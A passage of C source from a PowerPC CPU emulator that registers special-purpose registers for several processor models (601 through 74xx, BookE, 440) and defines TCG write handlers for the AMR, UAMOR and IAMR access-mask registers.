&spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_USIAR, "USIAR", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } #ifdef TARGET_PPC64 static void spr_write_amr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* * Note, the HV=1 PR=0 case is handled earlier by simply using * spr_write_generic for HV mode in the SPR table */ /* Build insertion mask into t1 based on context */ if (ctx->pr) { gen_load_spr(tcg_ctx, t1, SPR_UAMOR); } else { gen_load_spr(tcg_ctx, t1, SPR_AMOR); } /* Mask new bits into t2 */ tcg_gen_and_tl(tcg_ctx, t2, t1, cpu_gpr[gprn]); /* Load AMR and clear new bits in t0 */ gen_load_spr(tcg_ctx, t0, SPR_AMR); tcg_gen_andc_tl(tcg_ctx, t0, t0, t1); /* Or'in new bits and write it out */ tcg_gen_or_tl(tcg_ctx, t0, t0, t2); gen_store_spr(tcg_ctx, SPR_AMR, t0); spr_store_dump_spr(SPR_AMR); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void spr_write_uamor(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* * Note, the HV=1 case is handled earlier by simply using * spr_write_generic for HV mode in the SPR table */ /* Build insertion mask into t1 based on context */ gen_load_spr(tcg_ctx, t1, SPR_AMOR); /* Mask new bits into t2 */ tcg_gen_and_tl(tcg_ctx, t2, t1, cpu_gpr[gprn]); /* Load AMR and clear new bits in t0 */ gen_load_spr(tcg_ctx, t0, SPR_UAMOR); tcg_gen_andc_tl(tcg_ctx, t0, t0, t1); /* Or'in new bits and write it out */ tcg_gen_or_tl(tcg_ctx, t0, t0, t2); gen_store_spr(tcg_ctx, SPR_UAMOR, t0); spr_store_dump_spr(SPR_UAMOR); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void spr_write_iamr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* * Note, the HV=1 case is handled earlier by simply using * spr_write_generic for HV mode in the SPR table */ /* Build insertion mask into t1 based on context */ gen_load_spr(tcg_ctx, t1, SPR_AMOR); /* Mask new bits into t2 */ tcg_gen_and_tl(tcg_ctx, t2, t1, cpu_gpr[gprn]); /* Load AMR and clear new bits in t0 */ gen_load_spr(tcg_ctx, t0, SPR_IAMR); tcg_gen_andc_tl(tcg_ctx, t0, t0, t1); /* Or'in new bits and write it out */ tcg_gen_or_tl(tcg_ctx, t0, t0, t2); gen_store_spr(tcg_ctx, SPR_IAMR, t0); spr_store_dump_spr(SPR_IAMR); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); } static void gen_spr_amr(CPUPPCState *env) { /* * Virtual Page Class Key protection * * The AMR is accessible either via SPR 13 or SPR 29. 13 is * userspace accessible, 29 is privileged. So we only need to set * the kvm ONE_REG id on one of them, we use 29 */ spr_register(env, SPR_UAMR, "UAMR", &spr_read_generic, &spr_write_amr, &spr_read_generic, &spr_write_amr, 0); spr_register_kvm_hv(env, SPR_AMR, "AMR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_amr, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_AMR, 0); spr_register_kvm_hv(env, SPR_UAMOR, "UAMOR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_uamor, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_UAMOR, 0); spr_register_hv(env, SPR_AMOR, "AMOR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0); } static void gen_spr_iamr(CPUPPCState *env) { spr_register_kvm_hv(env, SPR_IAMR, "IAMR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_iamr, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_IAMR, 0); } #endif /* TARGET_PPC64 */ static void spr_read_thrm(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fixup_thrm(tcg_ctx, tcg_ctx->cpu_env); gen_load_spr(tcg_ctx, cpu_gpr[gprn], sprn); spr_load_dump_spr(tcg_ctx, sprn); } static void gen_spr_thrm(CPUPPCState *env) { /* Thermal management */ /* XXX : not implemented */ spr_register(env, SPR_THRM1, "THRM1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_thrm, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_THRM2, "THRM2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_thrm, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_THRM3, "THRM3", SPR_NOACCESS, SPR_NOACCESS, &spr_read_thrm, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 604 implementation */ static void gen_spr_604(CPUPPCState *env) { /* Processor identification */ spr_register(env, SPR_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register_kvm(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, KVM_REG_PPC_DABR, 0x00000000); /* Performance counters */ /* XXX : not implemented */ spr_register(env, SPR_7XX_MMCR0, "MMCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC1, "PMC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_PMC2, "PMC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_7XX_SIAR, "SIAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_SDA, "SDA", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, 0x00000000); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 603 implementation */ static void gen_spr_603(CPUPPCState *env) { /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC G2 implementation */ static void gen_spr_G2(CPUPPCState *env) { /* Memory base address */ /* MBAR */ /* XXX : not implemented */ spr_register(env, SPR_MBAR, "MBAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Exception processing */ spr_register(env, SPR_BOOKE_CSRR0, "CSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_CSRR1, "CSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Breakpoints */ /* XXX : not implemented */ spr_register(env, SPR_DABR, "DABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DABR2, "DABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR2, "IABR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IBCR, "IBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_DBCR, "DBCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 602 implementation */ static void gen_spr_602(CPUPPCState *env) { /* ESA registers */ /* XXX : not implemented */ spr_register(env, SPR_SER, "SER", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_SEBR, "SEBR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_ESASRR, "ESASRR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Floating point status */ /* XXX : not implemented */ spr_register(env, SPR_SP, "SP", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_LT, "LT", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Watchdog timer */ /* XXX : not implemented */ spr_register(env, SPR_TCR, "TCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Interrupt base */ spr_register(env, SPR_IBR, "IBR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_IABR, "IABR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } /* SPR specific to PowerPC 601 implementation */ static void gen_spr_601(CPUPPCState *env) { /* Multiplication/division register */ /* MQ */ spr_register(env, SPR_MQ, "MQ", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); /* RTC registers */ spr_register(env, SPR_601_RTCU, "RTCU", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_601_rtcu, 0x00000000); spr_register(env, SPR_601_VRTCU, "RTCU", &spr_read_601_rtcu, SPR_NOACCESS, &spr_read_601_rtcu, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_601_RTCL, "RTCL", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_601_rtcl, 0x00000000); spr_register(env, SPR_601_VRTCL, "RTCL", &spr_read_601_rtcl, SPR_NOACCESS, &spr_read_601_rtcl, SPR_NOACCESS, 0x00000000); /* Timer */ spr_register(env, SPR_601_UDECR, "UDECR", &spr_read_decr, SPR_NOACCESS, &spr_read_decr, SPR_NOACCESS, 0x00000000); /* External access control */ /* XXX : not implemented */ spr_register(env, SPR_EAR, "EAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Memory management */ spr_register(env, SPR_IBAT0U, "IBAT0U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT0L, "IBAT0L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); spr_register(env, SPR_IBAT1U, "IBAT1U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT1L, "IBAT1L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); spr_register(env, SPR_IBAT2U, "IBAT2U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT2L, "IBAT2L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); spr_register(env, SPR_IBAT3U, "IBAT3U", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatu, 0x00000000); spr_register(env, SPR_IBAT3L, "IBAT3L", SPR_NOACCESS, SPR_NOACCESS, &spr_read_601_ubat, &spr_write_601_ubatl, 0x00000000); env->nb_BATs = 4; } static void gen_spr_74xx(CPUPPCState *env) { /* Processor identification */ spr_register(env, SPR_PIR, "PIR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_pir, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_74XX_MMCR2, "MMCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_74XX_UMMCR2, "UMMCR2", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); /* XXX: not implemented */ spr_register(env, SPR_BAMR, "BAMR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MSSCR0, "MSSCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Hardware implementation registers */ /* XXX : not implemented */ spr_register(env, SPR_HID0, "HID0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_HID1, "HID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Altivec */ spr_register(env, SPR_VRSAVE, "VRSAVE", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_L2CR, "L2CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, spr_access_nop, 0x00000000); /* Not strictly an SPR */ vscr_init(env, 0x00010000); } static void gen_l3_ctrl(CPUPPCState *env) { /* L3CR */ /* XXX : not implemented */ spr_register(env, SPR_L3CR, "L3CR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3ITCR0 */ /* XXX : not implemented */ spr_register(env, SPR_L3ITCR0, "L3ITCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* L3PM */ /* XXX : not implemented */ spr_register(env, SPR_L3PM, "L3PM", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void gen_74xx_soft_tlb(CPUPPCState *env, int nb_tlbs, int nb_ways) { env->nb_tlb = nb_tlbs; env->nb_ways = nb_ways; env->id_tlbs = 1; env->tlb_type = TLB_6XX; /* XXX : not implemented */ spr_register(env, SPR_PTEHI, "PTEHI", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_PTELO, "PTELO", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_TLBMISS, "TLBMISS", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static void spr_write_e500_l1csr0(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], L1CSR0_DCE | L1CSR0_CPE); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static void spr_write_e500_l1csr1(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], L1CSR1_ICE | L1CSR1_CPE); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); } static void spr_write_booke206_mmucsr0(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_booke206_tlbflush(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_booke_pid(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn); gen_helper_booke_setpid(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]); tcg_temp_free_i32(tcg_ctx, t0); } static void spr_write_eplc(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_booke_set_eplc(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void spr_write_epsc(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_booke_set_epsc(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } static void gen_spr_usprg3(CPUPPCState *env) { spr_register(env, SPR_USPRG3, "USPRG3", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); } static void gen_spr_usprgh(CPUPPCState *env) { spr_register(env, SPR_USPRG4, "USPRG4", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_USPRG5, "USPRG5", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_USPRG6, "USPRG6", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); spr_register(env, SPR_USPRG7, "USPRG7", &spr_read_ureg, SPR_NOACCESS, &spr_read_ureg, SPR_NOACCESS, 0x00000000); } /* PowerPC BookE SPR */ static void gen_spr_BookE(CPUPPCState *env, uint64_t ivor_mask) { const char *ivor_names[64] = { "IVOR0", "IVOR1", "IVOR2", "IVOR3", "IVOR4", "IVOR5", "IVOR6", "IVOR7", "IVOR8", "IVOR9", "IVOR10", "IVOR11", "IVOR12", "IVOR13", "IVOR14", "IVOR15", "IVOR16", "IVOR17", "IVOR18", "IVOR19", "IVOR20", "IVOR21", "IVOR22", "IVOR23", "IVOR24", "IVOR25", "IVOR26", "IVOR27", "IVOR28", "IVOR29", "IVOR30", "IVOR31", "IVOR32", "IVOR33", "IVOR34", "IVOR35", "IVOR36", "IVOR37", "IVOR38", "IVOR39", "IVOR40", "IVOR41", "IVOR42", "IVOR43", "IVOR44", "IVOR45", "IVOR46", "IVOR47", "IVOR48", "IVOR49", "IVOR50", "IVOR51", "IVOR52", "IVOR53", "IVOR54", "IVOR55", "IVOR56", "IVOR57", "IVOR58", "IVOR59", "IVOR60", "IVOR61", "IVOR62", "IVOR63", }; #define SPR_BOOKE_IVORxx (-1) int ivor_sprn[64] = { SPR_BOOKE_IVOR0, SPR_BOOKE_IVOR1, SPR_BOOKE_IVOR2, SPR_BOOKE_IVOR3, SPR_BOOKE_IVOR4, SPR_BOOKE_IVOR5, SPR_BOOKE_IVOR6, SPR_BOOKE_IVOR7, SPR_BOOKE_IVOR8, SPR_BOOKE_IVOR9, SPR_BOOKE_IVOR10, SPR_BOOKE_IVOR11, SPR_BOOKE_IVOR12, SPR_BOOKE_IVOR13, SPR_BOOKE_IVOR14, SPR_BOOKE_IVOR15, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVOR32, SPR_BOOKE_IVOR33, SPR_BOOKE_IVOR34, SPR_BOOKE_IVOR35, SPR_BOOKE_IVOR36, SPR_BOOKE_IVOR37, SPR_BOOKE_IVOR38, SPR_BOOKE_IVOR39, SPR_BOOKE_IVOR40, SPR_BOOKE_IVOR41, SPR_BOOKE_IVOR42, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, SPR_BOOKE_IVORxx, }; int i; /* Interrupt processing */ spr_register(env, SPR_BOOKE_CSRR0, "CSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_CSRR1, "CSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* Debug */ /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC1, "IAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_IAC2, "IAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DAC1, "DAC1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DAC2, "DAC2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBCR0, "DBCR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_40x_dbcr0, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBCR1, "DBCR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBCR2, "DBCR2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_DSRR0, "DSRR0", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_DSRR1, "DSRR1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_BOOKE_DBSR, "DBSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_clear, 0x00000000); spr_register(env, SPR_BOOKE_DEAR, "DEAR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_ESR, "ESR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_IVPR, "IVPR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_excp_prefix, 0x00000000); /* Exception vectors */ for (i = 0; i < 64; i++) { if (ivor_mask & (1ULL << i)) { if (ivor_sprn[i] == SPR_BOOKE_IVORxx) { fprintf(stderr, "ERROR: IVOR %d SPR is not defined\n", i); exit(1); } spr_register(env, ivor_sprn[i], ivor_names[i], SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_excp_vector, 0x00000000); } } spr_register(env, SPR_BOOKE_PID, "PID", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_pid, 0x00000000); spr_register(env, SPR_BOOKE_TCR, "TCR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_tcr, 0x00000000); spr_register(env, SPR_BOOKE_TSR, "TSR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_tsr, 0x00000000); /* Timer */ spr_register(env, SPR_DECR, "DECR", SPR_NOACCESS, SPR_NOACCESS, &spr_read_decr, &spr_write_decr, 0x00000000); spr_register(env, SPR_BOOKE_DECAR, "DECAR", SPR_NOACCESS, SPR_NOACCESS, SPR_NOACCESS, &spr_write_generic, 0x00000000); /* SPRGs */ spr_register(env, SPR_USPRG0, "USPRG0", &spr_read_generic, &spr_write_generic, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG4, "SPRG4", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG5, "SPRG5", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG6, "SPRG6", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_SPRG7, "SPRG7", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_SPRG8, "SPRG8", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); spr_register(env, SPR_BOOKE_SPRG9, "SPRG9", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_generic, 0x00000000); } static inline uint32_t gen_tlbncfg(uint32_t assoc, uint32_t minsize, uint32_t maxsize, uint32_t flags, uint32_t nentries) { return (assoc << TLBnCFG_ASSOC_SHIFT) | (minsize << TLBnCFG_MINSIZE_SHIFT) | (maxsize << TLBnCFG_MAXSIZE_SHIFT) | flags | nentries; } /* BookE 2.06 storage control registers */ static void gen_spr_BookE206(CPUPPCState *env, uint32_t mas_mask, uint32_t *tlbncfg, uint32_t mmucfg) { const char *mas_names[8] = { "MAS0", "MAS1", "MAS2", "MAS3", "MAS4", "MAS5", "MAS6", "MAS7", }; int mas_sprn[8] = { SPR_BOOKE_MAS0, SPR_BOOKE_MAS1, SPR_BOOKE_MAS2, SPR_BOOKE_MAS3, SPR_BOOKE_MAS4, SPR_BOOKE_MAS5, SPR_BOOKE_MAS6, SPR_BOOKE_MAS7, }; int i; /* TLB assist registers */ /* XXX : not implemented */ for (i = 0; i < 8; i++) { void (*uea_write)(DisasContext *ctx, int sprn, int gprn) = &spr_write_generic32; if (i == 2 && (mas_mask & (1 << i)) && (env->insns_flags & PPC_64B)) { uea_write = &spr_write_generic; } if (mas_mask & (1 << i)) { spr_register(env, mas_sprn[i], mas_names[i], SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, uea_write, 0x00000000); } } if (env->nb_pids > 1) { /* XXX : not implemented */ spr_register(env, SPR_BOOKE_PID1, "PID1", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_pid, 0x00000000); } if (env->nb_pids > 2) { /* XXX : not implemented */ spr_register(env, SPR_BOOKE_PID2, "PID2", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_booke_pid, 0x00000000); } spr_register(env, SPR_BOOKE_EPLC, "EPLC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_eplc, 0x00000000); spr_register(env, SPR_BOOKE_EPSC, "EPSC", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, &spr_write_epsc, 0x00000000); /* XXX : not implemented */ spr_register(env, SPR_MMUCFG, "MMUCFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, mmucfg); switch (env->nb_ways) { case 4: spr_register(env, SPR_BOOKE_TLB3CFG, "TLB3CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[3]); /* Fallthru */ case 3: spr_register(env, SPR_BOOKE_TLB2CFG, "TLB2CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[2]); /* Fallthru */ case 2: spr_register(env, SPR_BOOKE_TLB1CFG, "TLB1CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[1]); /* Fallthru */ case 1: spr_register(env, SPR_BOOKE_TLB0CFG, "TLB0CFG", SPR_NOACCESS, SPR_NOACCESS, &spr_read_generic, SPR_NOACCESS, tlbncfg[0]); /* Fallthru */ case 0: default: break; } gen_spr_usprgh(env); } /* SPR specific to PowerPC 440 implementation */ static void gen_spr_440(CPUPPCState *env) { /* Cache control */ /* XXX : not implemented */ spr_register(env, SPR_440_DNV0, "DNV0", SPR_NOACCESS, 